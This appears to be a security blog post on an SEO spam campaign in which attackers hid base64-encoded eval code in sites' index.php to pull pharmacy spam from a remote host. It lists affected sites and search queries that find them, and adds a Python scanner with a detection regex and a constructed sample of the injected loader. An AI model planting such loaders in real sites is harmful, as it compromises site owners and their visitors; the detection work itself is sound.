We have been tracking another wave of SPAM that is affecting many popular web sites. What is interesting is that all of them have been controlled by just one site: http://www.google-traffic-analytics.com.
And when this site went down, guess what is showing up on Google:
Yes, that’s around 202k different pages that have been hacked and are showing those results. When google-traffic-analytics.com was up, instead of that error it would serve SPAM to search engines (5 mg tadalafil, viagra, etc).
Just some of the affected sites:
www.archaeological.org (Archaeological Institute of America)
www.energycenter.org (Center for sustainable Energy)
www.ieta.org (International Emissions trading association)
www.efpa-italia.org (European Financial planning association)
Finding them on Google is pretty simple as well: search for inurl:.org "5mg tadalafil", or for "http://www.google-traffic-analytics.com" "Warning: file_get_contents", which is the error you get when you try to access a hacked site while the google-traffic-analytics site is offline.
As far as cleaning up an affected site, it looks like the attackers added a base64-encoded eval inside the index.php file that loads http://www.google-traffic-analytics.com and presents the SPAM if the request came from a search engine. Removing that code should be enough to get rid of the spam (or the error) itself, but you still have to find the root cause that allowed your site to get hacked.
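One way to look for the injected code described above, as an added example that is not from the original post: a Python scanner that finds eval(base64_decode(...)) calls in PHP files, decodes them (following nested layers), and reports any URLs and file_get_contents calls inside. The function names, the layer limit and the sample file are assumptions; the sample payload is constructed, not recovered from a hacked site.

```python
import base64
import binascii
import re
from pathlib import Path

# eval(base64_decode('...')), any spacing, either quote style
EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)",
    re.IGNORECASE)
URL = re.compile(r"https?://[^\s'\"<>)]+", re.IGNORECASE)
MAX_LAYERS = 5  # assumption: stop after a few nested encodings

def decode_layers(blob):
    """Decode base64, following nested eval(base64_decode()) layers."""
    text = ""
    for _ in range(MAX_LAYERS):
        try:
            raw = base64.b64decode(re.sub(r"\s+", "", blob), validate=True)
        except (binascii.Error, ValueError):
            break  # malformed blob: keep whatever was decoded so far
        text = raw.decode("utf-8", "replace")
        inner = EVAL_B64.search(text)
        if inner is None:
            break
        blob = inner.group(2)
    return text

def scan_php_source(source):
    """One finding per encoded eval: line, decoded code, URLs, fetch flag."""
    findings = []
    for m in EVAL_B64.finditer(source):
        decoded = decode_layers(m.group(2))
        findings.append({
            "line": source.count("\n", 0, m.start()) + 1,
            "decoded": decoded,
            "urls": URL.findall(decoded),
            "remote_fetch": "file_get_contents" in decoded,
        })
    return findings

def scan_tree(root):
    """Map path -> findings for every .php file under root that has a hit."""
    results = ((str(p), scan_php_source(p.read_text(errors="replace")))
               for p in Path(root).rglob("*.php"))
    return {path: found for path, found in results if found}

# Constructed sample (not from a real site), encoded here so it runs offline.
SAMPLE_PAYLOAD = "echo file_get_contents('http://www.google-traffic-analytics.com');"
SAMPLE_INDEX = "<?php\neval(base64_decode('%s'));\ninclude 'template.php';\n" % (
    base64.b64encode(SAMPLE_PAYLOAD.encode()).decode())
```

Run scan_tree() against a copy of the web root; a hit only locates the injected code, so the decoded text still has to be reviewed by hand.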
We will post more details when we have them.